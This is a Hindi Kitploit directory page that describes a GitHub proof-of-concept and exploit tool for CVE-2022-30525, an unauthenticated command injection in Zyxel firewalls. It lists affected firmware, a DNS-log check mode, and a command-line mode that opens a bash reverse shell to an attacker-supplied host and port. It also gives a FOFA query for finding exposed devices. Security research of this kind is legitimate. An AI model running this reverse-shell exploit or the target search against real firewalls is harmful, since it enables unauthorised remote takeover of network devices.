Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-30525 — CVE-2022-30525 Zyxel फ़ायरवॉल कमांड इंजेक्शन भेद्यता POC&EXPC | Kitploit
उपकरण/GitHubGitHub/west9b/cve-2022-30525
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubwest9b/cve-2022-30525

CVE-2022-30525

CVE-2022-30525 Zyxel फ़ायरवॉल कमांड इंजेक्शन भेद्यता POC&EXPC

रिपॉजिटरी देखें
12334 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-30525 Zyxel फ़ायरवॉल कमांड इंजेक्शन भेद्यता

CVE-2022-30525 POC&EXP

author:160team.west9B

केवल अधिकृत स्थितियों में सुरक्षा शोधकर्ताओं द्वारा उपयोग के लिए। साइबर सुरक्षा कानून का पालन करें। किसी भी समस्या के परिणाम स्वयं वहन करें, लेखक जिम्मेदार नहीं है।

01-मूल परिचय

12 मई 2022 को, Zyxel ने अपने फ़ायरवॉल उपकरणों में बिना प्रमाणीकरण वाली रिमोट कमांड इंजेक्शन भेद्यता (CVE-2022-30525) को ठीक करने के लिए एक सुरक्षा बुलेटिन जारी किया, जिसका CVSS स्कोर 9.8 है। यह भेद्यता कुछ Zyxel फ़ायरवॉल संस्करणों के CGI प्रोग्राम में मौजूद है, जो बिना प्रमाणीकरण के प्रभावित उपकरणों पर मनमाना कमांड निष्पादित करने की अनुमति देती है।

प्रभावित सीमा:

ATP श्रृंखला फर्मवेयर: 5.10-5.21 Patch 1

VPN श्रृंखला फर्मवेयर: 4.60-5.21 Patch 1

USG FLEX 100(W), 200, 500, 700: 5.00-5.21 Patch 1

USG FLEX 50(W)/USG20(W)-VPN: 5.10-5.21 Patch 1

02-उपयोग निर्देश

usage_poc: ./cve-2022-30525 -m poc -u url

usage_exp: ./cve-2022-30525 -m exp -u url -lhost ip -lport port

1. POC

इस भेद्यता के कमांड निष्पादन में कोई आउटपुट (ईको) नहीं होता है, इसलिए POC सत्यापन dnslog API का अनुरोध करता है; यदि dnslog पर अनुरोध आता है, तो भेद्यता मौजूद है। नेटवर्क विलंब के कारण गलत सकारात्मक परिणाम से बचने के लिए, DNSLOG सत्यापन अनुरोध 10 सेकंड विलंबित होता है।

usage_poc: ./cve-2022-30525 -m poc -u https://192.168.1.1/

2. exp

exp bash रिवर्स शेल है; -m exp के बाद VPS IP तथा पोर्ट निर्दिष्ट करें।

**usage_exp:./cve-2022-30525 -m exp -u https://192.168.1.1/ -lhost 192.168.1.2 -lport 1337 **

Screenshots

Image text Image text

refer

https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/

fofa

title="USG FLEX xx"

टूल डाउनलोड करें